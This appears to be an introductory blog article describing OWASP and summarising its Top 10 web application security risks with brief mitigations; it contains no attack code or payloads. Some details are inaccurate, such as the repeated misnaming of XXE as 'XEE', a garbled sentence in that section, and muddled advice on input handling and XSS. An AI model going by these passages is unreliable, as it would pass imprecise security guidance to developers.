The OWASP, also known as “Open Web Application Security Project”, is an internationally recognized non-profit organization solely dedicated to the security of web applications. It was first developed in 2003. The OWASP has one core principle that every material is available to the public for free, and everyone can improve their web application security. The OWASP offers forums, extensive documentation, tutorials and videos for beginners and learners. One of their known projects is OWASP Top10.
What is OWASP Top 10?
The OWASP Top 10 is a continuously improved and updated report which states the security concerns for web applications and outlines the most critical i.e. top 10 issues. At the OWASP organization, a dedicated team of security experts is responsible for updating this document. The OWASP Top 10 is an “awareness document” (not a standard) and a recommendation guide for all the companies for minimizing and mitigating the web application security risks.
Security Risks Reported in OWASP Top 10
The following Security Risks are reported in the latest OWASP Top 10 report:
1. Injection
Injection attacks are listed as one of the top 10 security risks in the security of web applications. An injection attack refers to a broad category of attack vectors. In this attack, an attacker/hacker gives untrusted or malicious input to a web application in such a way that the interpreter processes it as a part of the query or programming command. Consequently, this disrupts the flow of execution.
The injection attack is one of the oldest and most risky attacks aimed at web applications. The consequences of an injection attack are but not limited to data theft, DDoS attacks, loss of data integrity, data manipulation and in most severe cases loss of full control over your system.
The most common reason due to which these attacks become successful is the inefficient or no validation of user input. The Injection attacks like SQL Injections, Cross Site Scripting (XSS) are not only very risky but also very commonly found in legacy applications. The injection attack vulnerabilities are very scary because the attacking surface is huge especially in the case of XSS and SQL injection vulnerabilities.
Other than that, these attacks are very easy to carry out because there are many free tools available in the market that even allow inexperienced attackers to carry out injection attacks successfully. The injections can be prevented by input validation and sanitizing the user-submitted data. The application code should never use the user input directly. Another way to save code from injections is to avoid all the user supplied inputs.
2. Broken Authentication
The Broken Authentication i.e. loopholes in authentication systems (login system) can give hackers access to the user’s sensitive information and even the ability to control the complete system by taking over an admin account. The Broken Authentication risks can be mitigated by using a 2-factor authentication, one-time passwords, adding Google Titan security key, and delaying or limiting the number of login attempts for a certain time interval.
3. Sensitive Data Exposure
If the web application security is not done properly, the attackers can use sensitive information like passwords to gain access user accounts and use this data for selling or other unlawful purposes. The most popular method for stealing sensitive information is by using a man-in-the-middle attack. The Sensitive Data Exposure can be reduced by using encryption for the handling of sensitive data and disabling the caching features for sensitive information, or you can use a signed URL.
4. XML External Entities (XEE)
The XEE attack is against a web application that parses the XML (XML language also known as Extensible Markup Language is both machine and human-readable) input. So, the external entity such as hard drive which attempts to exploit a vulnerability in the parser. An XML parser can be tricked into sending data to an unauthorized external entity which can directly pass the sensitive data to a hacker. The best way to prevent XEE attacks is to avoid XML input and use a less complex and more secure type such as JSON. The least can be done by patching XML parsers and disabling the use of external entities in an XML application.
5. Broken Access Control
Access Control is a system that is responsible for controlling access to core functionality and information. This vulnerability allows the attackers to by-pass the authorization checks and performs tasks by impersonating the privileged users i.e. admin users. An example of broken access control is that a web application allows a user to change the account which they are from logged in as by plainly changing the URL without any verification check. The Access Control can be protected by using an authorization token and by setting tight controls on them.
6. Security Misconfiguration
Security Misconfiguration is one of the most common vulnerabilities and is the by-product using default configuration or displaying the excessively verbose errors. The risks due to Security Misconfigurations can be mitigated by removing the unused features from code and making sure that the error messages are general.
7. Cross-Site Scripting
Cross-Site Scripting, also known as XSS is a prevalent web security threat and one of the favorite methods of attackers to steal your personal information. In XSS, the attackers add a malicious piece of code in your server code. Whenever a client sends a request on your website, this code becomes a part of the client’s side and hackers can steal confidential information. Normally, XSS is common to websites that usually allow users to share data and content e.g. blogs and etc. A Web Application Firewall can be used to mitigate the XSS risks. The untrusted HTTP requests should also be escaped and modern development frames like ROR and ReactJS should be used because they have some built-in cross-site scripting protection.
8. Insecure Deserialization
The risks of Insecure Deserialization mainly occurs in web applications which serialize and deserialize data very often. Serialization means taking the data from the application code and converting the data into other formats for data storage, while deserialization is the opposite of it. The insecure deserialization occurs when we deserialize the data from untrusted sources which results in serious consequences like DDoS attacks and in some severe cases remote code can be executed as well. The only best strategy to prevent this is to only deserialize the data from trusted sources.
9. Using Components With Known Vulnerabilities
One of the most common risks for web application security is that the developers often use components in their codes (e.g. libraries and frameworks) with known vulnerabilities. The known vulnerabilities make it easier for attackers to compromise a system. To minimize the risks of security of web applications, the developers should make routine audits and remove the frameworks or libraries with known vulnerabilities.
10. Insufficient Logging And Monitoring
Insufficient Logging and Monitoring is also one of the major contributors that add vulnerability to the security of web applications. To date, many web applications poorly monitored and logged for the detection of data breach. The average time for a company to be aware of a security breach is around 200 days. This gives plenty of times for attackers to manipulate or wrongfully use the data. OWASP recommends the developers to do proper monitoring, implement proper checks and ensure that proper logging is being done for the web application.